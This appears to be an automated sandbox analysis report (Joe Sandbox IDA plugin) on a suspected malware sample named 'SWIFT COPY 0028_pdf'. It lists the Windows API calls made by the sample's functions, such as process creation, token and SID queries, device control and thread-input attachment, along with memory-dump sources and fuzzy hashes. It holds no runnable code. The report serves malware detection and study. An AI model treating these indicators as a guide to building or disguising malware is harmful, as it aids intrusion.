                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastacceptselect
                                                                                    • String ID:
                                                                                    • API String ID: 385091864-0
                                                                                    • Opcode ID: 3e012a3d4e9ae93c99e84ab2b842175478e0603bd18c53478dc0df66d1cdb44e
                                                                                    • Instruction ID: 694a0598c0a66659d835714e741fea63cf13ba74fd79ef5d3e99bc6c0bb4f54e
                                                                                    • Opcode Fuzzy Hash: 3e012a3d4e9ae93c99e84ab2b842175478e0603bd18c53478dc0df66d1cdb44e
                                                                                    • Instruction Fuzzy Hash: EC216672A011249FC7159F69D885A9E7BECEF4A350F00816AF84AD7251DB749A418FD0
                                                                                    APIs
                                                                                      • Part of subcall function 00961E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00960ABB,?,?,?,0096187A,00000000,000000EF,00000119,?,?), ref: 00961E77
                                                                                      • Part of subcall function 00961E68: lstrcpyW.KERNEL32(00000000,?,?,00960ABB,?,?,?,0096187A,00000000,000000EF,00000119,?,?,00000000), ref: 00961E9D
                                                                                      • Part of subcall function 00961E68: lstrcmpiW.KERNEL32(00000000,?,00960ABB,?,?,?,0096187A,00000000,000000EF,00000119,?,?), ref: 00961ECE
                                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0096187A,00000000,000000EF,00000119,?,?,00000000), ref: 00960AD4
                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,0096187A,00000000,000000EF,00000119,?,?,00000000), ref: 00960AFA
                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,0096187A,00000000,000000EF,00000119,?,?,00000000), ref: 00960B2E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                    • String ID: cdecl
                                                                                    • API String ID: 4031866154-3896280584
                                                                                    • Opcode ID: 5452342defd1f3d8a9b1c88c2d8bc171d28acec4e198e0c89c17edde268ac6ac
                                                                                    • Instruction ID: 9f8aa4af17e83f4164387965cfee8a35a6d71bb38d9c2f10ccc42ba4ed44604f
                                                                                    • Opcode Fuzzy Hash: 5452342defd1f3d8a9b1c88c2d8bc171d28acec4e198e0c89c17edde268ac6ac
                                                                                    • Instruction Fuzzy Hash: F4118136210305AFDB25AF34DC45E7A77A9FF86354B80806AE806CB260EB719850D7E0
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00952FB5
                                                                                      • Part of subcall function 0094395C: __FF_MSGBANNER.LIBCMT ref: 00943973
                                                                                      • Part of subcall function 0094395C: __NMSG_WRITE.LIBCMT ref: 0094397A
                                                                                      • Part of subcall function 0094395C: RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001,00000001,00000000,?,?,0093F507,?,0000000E), ref: 0094399F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 614378929-0
                                                                                    • Opcode ID: f58c78faea22053957e64a5807f1510619b7f40dcc8e8d2dd8aa071634e13fe3
                                                                                    • Instruction ID: 9699f5073905b3a5c0f780f81717d156eefb62052de5c5d6a139fb321c728b84
                                                                                    • Opcode Fuzzy Hash: f58c78faea22053957e64a5807f1510619b7f40dcc8e8d2dd8aa071634e13fe3
                                                                                    • Instruction Fuzzy Hash: 8B11E73250D315ABCF217FB1AC44B697B98AF813A6F208825FC499A191DB34CD849790
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009605AC
                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009605C7
                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009605DD
                                                                                    • FreeLibrary.KERNEL32(?), ref: 00960632
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                    • String ID:
                                                                                    • API String ID: 3137044355-0
                                                                                    • Opcode ID: 374ac2b821d6e0bc454d5bdac358e940160dd46134d873be490e585ab3404ec2
                                                                                    • Instruction ID: 5f8b4953f36642563d5c3bff9d1cfabc17207e305617618bb90dd1fc1a11775c
                                                                                    • Opcode Fuzzy Hash: 374ac2b821d6e0bc454d5bdac358e940160dd46134d873be490e585ab3404ec2
                                                                                    • Instruction Fuzzy Hash: 6C217C71901209EFDB208F91DCC8ADBBBB8EF80704F008A69E51A96150DB74EA55EF90
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00966733
                                                                                    • _memset.LIBCMT ref: 00966754
                                                                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009667A6
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 009667AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                    • String ID:
                                                                                    • API String ID: 1157408455-0
                                                                                    • Opcode ID: 43daac7d4e9c0ec6d11f961bc0227795d34b41d8cf4869287e4be244ab071461
                                                                                    • Instruction ID: f3e6d92f4e7d35204428ec3894f0bf29a3ac6f24dcad8008a3a400d6fe22aeb4
                                                                                    • Opcode Fuzzy Hash: 43daac7d4e9c0ec6d11f961bc0227795d34b41d8cf4869287e4be244ab071461
                                                                                    • Instruction Fuzzy Hash: 0E110672D023287AE7209BA5AC4DFAFBABCEF45724F10419AF505E71C0D2744E80CBA4
                                                                                    APIs
                                                                                      • Part of subcall function 0095AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0095AA79
                                                                                      • Part of subcall function 0095AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0095AA83
                                                                                      • Part of subcall function 0095AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0095AA92
                                                                                      • Part of subcall function 0095AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0095AA99
                                                                                      • Part of subcall function 0095AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0095AAAF
                                                                                    • GetLengthSid.ADVAPI32(?,00000000,0095ADE4,?,?), ref: 0095B21B
                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0095B227
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0095B22E
                                                                                    • CopySid.ADVAPI32(?,00000000,?), ref: 0095B247
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                                    • String ID:
                                                                                    • API String ID: 4217664535-0
                                                                                    • Opcode ID: b9ab7c4de158188aaf8edfe62b9024a006042fa072d4f9dc369ec70515bc93fc
                                                                                    • Instruction ID: ea2ca6d9a5118cac2d607583c59e770b883e716db9cc32ac6fe506ac538547db
                                                                                    • Opcode Fuzzy Hash: b9ab7c4de158188aaf8edfe62b9024a006042fa072d4f9dc369ec70515bc93fc
                                                                                    • Instruction Fuzzy Hash: CE11CE71A00205EFCB04DF99EC84AAEB7ADEF95305F14802DE9539B250D731AE48DB60
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0095B498
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0095B4AA
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0095B4C0
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0095B4DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: d7efc94ed7358e84b3343db1a8db748a565912953a67c46695252ffcd8f7e8ca
                                                                                    • Instruction ID: 473a3d2d846c114d57ebea4db42164e5bd4e78a8adb154247ac43163dbfbdcdf
                                                                                    • Opcode Fuzzy Hash: d7efc94ed7358e84b3343db1a8db748a565912953a67c46695252ffcd8f7e8ca
                                                                                    • Instruction Fuzzy Hash: 5611487A900218FFDB21DFA9C881E9DBBB8FB08700F204091EA04B7290D771AE10DB94
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0093B5A5
                                                                                    • GetClientRect.USER32(?,?), ref: 0099E69A
                                                                                    • GetCursorPos.USER32(?), ref: 0099E6A4
                                                                                    • ScreenToClient.USER32(?,?), ref: 0099E6AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4127811313-0
                                                                                    • Opcode ID: a5fead8d846535cd19d8f51da86070e197ae8988c71ed780442217103705fcc5
                                                                                    • Instruction ID: e8c7a1312f8ef502e309d8b7985cd76761f05eef5ae936cde5aee6c5aa79238b
                                                                                    • Opcode Fuzzy Hash: a5fead8d846535cd19d8f51da86070e197ae8988c71ed780442217103705fcc5
                                                                                    • Instruction Fuzzy Hash: 0E115731A0102ABFDF10EF98CC899EE7BB9EF49304F000451FA02E7140D334AA81DBA1
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00967352
                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00967385
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0096739B
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009673A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 2880819207-0
                                                                                    • Opcode ID: 2bde66ab64aa0e7f36beefc0ea698b23a2794b47df4a57c099d2d89a3ea938dc
                                                                                    • Instruction ID: 11f0848bf92e3f7c04c6d6af9abd2b89edb20c15f99cf9f46a22078e180509df
                                                                                    • Opcode Fuzzy Hash: 2bde66ab64aa0e7f36beefc0ea698b23a2794b47df4a57c099d2d89a3ea938dc
                                                                                    • Instruction Fuzzy Hash: DB11C872A1C244BFC7019BA8DC49E9EBBADAF45314F144355F935E3351D6708D00ABA1
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0093D1BA
                                                                                    • GetStockObject.GDI32(00000011), ref: 0093D1CE
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0093D1D8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3970641297-0
                                                                                    • Opcode ID: 01ed1d2ef45bbdcccca80478292eea64e50bbef8a147f583c1eb67933152f8cb
                                                                                    • Instruction ID: 906d109c18a564ce6419dd80506501a67a254ae8ff53099be73c9148cb69eaaa
                                                                                    • Opcode Fuzzy Hash: 01ed1d2ef45bbdcccca80478292eea64e50bbef8a147f583c1eb67933152f8cb
                                                                                    • Instruction Fuzzy Hash: 8811ADB250A509BFEF1A4F90AC60EEABB6DFF09364F040105FA0552050C731DD60AFE0
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                    • String ID:
                                                                                    • API String ID: 3016257755-0
                                                                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                    • Instruction ID: ee09999f2256dcfe57340054b25d0841bcc1fedf8212efb87a53a4a8dc176015
                                                                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                    • Instruction Fuzzy Hash: 2401803200014EBBCF529E85DC168EE3F37BF18356B498415FE1859031D336CAB9AB81
                                                                                    APIs
                                                                                      • Part of subcall function 00947A0D: __getptd_noexit.LIBCMT ref: 00947A0E
                                                                                    • __lock.LIBCMT ref: 0094748F
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 009474AC
                                                                                    • _free.LIBCMT ref: 009474BF
                                                                                    • InterlockedIncrement.KERNEL32(00FE1390), ref: 009474D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                    • String ID:
                                                                                    • API String ID: 2704283638-0
                                                                                    • Opcode ID: b4a207440a44fcfce5fd42096c4c1d8e30235f2663c5210d5be3090e6b5aa799
                                                                                    • Instruction ID: 8e97c981fca13a27110f30ff51a10e74f4c348ffaf1e7e8ff80d9683017a1835
                                                                                    • Opcode Fuzzy Hash: b4a207440a44fcfce5fd42096c4c1d8e30235f2663c5210d5be3090e6b5aa799
                                                                                    • Instruction Fuzzy Hash: 3501223694E629ABCB22AFA59805F2DFB62BF45710F168006F814736A0CB305980DFC2
                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 00947AD8
                                                                                      • Part of subcall function 00947CF4: __mtinitlocknum.LIBCMT ref: 00947D06
                                                                                      • Part of subcall function 00947CF4: EnterCriticalSection.KERNEL32(00000000,?,00947ADD,0000000D), ref: 00947D1F
                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 00947AE5
                                                                                    • __lock.LIBCMT ref: 00947AF9
                                                                                    • ___addlocaleref.LIBCMT ref: 00947B17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                    • String ID:
                                                                                    • API String ID: 1687444384-0
                                                                                    • Opcode ID: af957c62ae72c2390265b38a7dee1b41b78900c14f679340a9aec33fa4d09a6c
                                                                                    • Instruction ID: 9fd6d6070eafece87e99401c16e6b7328fa56916d013baf17e31df9939759699
                                                                                    • Opcode Fuzzy Hash: af957c62ae72c2390265b38a7dee1b41b78900c14f679340a9aec33fa4d09a6c
                                                                                    • Instruction Fuzzy Hash: 0A015B71445B049ED720DFB5D905B4AF7F0EF80325F20890EA49A966E0CB74A680CB51
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0098E33D
                                                                                    • _memset.LIBCMT ref: 0098E34C
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009E3D00,009E3D44), ref: 0098E37B
                                                                                    • CloseHandle.KERNEL32 ref: 0098E38D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset$CloseCreateHandleProcess
                                                                                    • String ID:
                                                                                    • API String ID: 3277943733-0
                                                                                    • Opcode ID: 44f6c2bcd294b31c614a104b598498784cd0202334464895fcd840bad534e358
                                                                                    • Instruction ID: b4d1802adbf4235d8c3e378cc1f7acd06b631aa6777ccc9d67e4fa3d76b3252e
                                                                                    • Opcode Fuzzy Hash: 44f6c2bcd294b31c614a104b598498784cd0202334464895fcd840bad534e358
                                                                                    • Instruction Fuzzy Hash: C9F0BEF0920344BAE3112B61EC89F773E9DDB09714F008021BF08DB1E2D3719E40A6A8
                                                                                    APIs
                                                                                      • Part of subcall function 0093AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0093AFE3
                                                                                      • Part of subcall function 0093AF83: SelectObject.GDI32(?,00000000), ref: 0093AFF2
                                                                                      • Part of subcall function 0093AF83: BeginPath.GDI32(?), ref: 0093B009
                                                                                      • Part of subcall function 0093AF83: SelectObject.GDI32(?,00000000), ref: 0093B033
                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0098EA8E
                                                                                    • LineTo.GDI32(00000000,?,?), ref: 0098EA9B
                                                                                    • EndPath.GDI32(00000000), ref: 0098EAAB
                                                                                    • StrokePath.GDI32(00000000), ref: 0098EAB9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                    • String ID:
                                                                                    • API String ID: 1539411459-0
                                                                                    • Opcode ID: 2ee97c4f949302ab1040e64746f13be78bcb4293f984e473aebf1e4dffa46dad
                                                                                    • Instruction ID: e6d037acbe3d5bf9a4b5611f422d415859733b3ab13f23ac5fcd09181f35a3c9
                                                                                    • Opcode Fuzzy Hash: 2ee97c4f949302ab1040e64746f13be78bcb4293f984e473aebf1e4dffa46dad
                                                                                    • Instruction Fuzzy Hash: CFF0823101A269BBDB12AF94AD0DFCE3F19AF07711F044101FA12651E187745A52EBD5
                                                                                    APIs
                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0095C84A
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0095C85D
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0095C864
                                                                                    • AttachThreadInput.USER32(00000000), ref: 0095C86B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2710830443-0
                                                                                    • Opcode ID: 11613e2944e356f6fdb0422f04836ef5d00eba64f24aae5fbb81a09f1cbda782
                                                                                    • Instruction ID: aba7acd5f43ef7ba97c64bbf86019cbdf0874e9c9b96e467daeeb810939a50e2
                                                                                    • Opcode Fuzzy Hash: 11613e2944e356f6fdb0422f04836ef5d00eba64f24aae5fbb81a09f1cbda782
                                                                                    • Instruction Fuzzy Hash: 89E065B11463247ADB105F62DC0DEDB7F5CEF067A1F008011BA0E84850C671D584DBE0
                                                                                    APIs
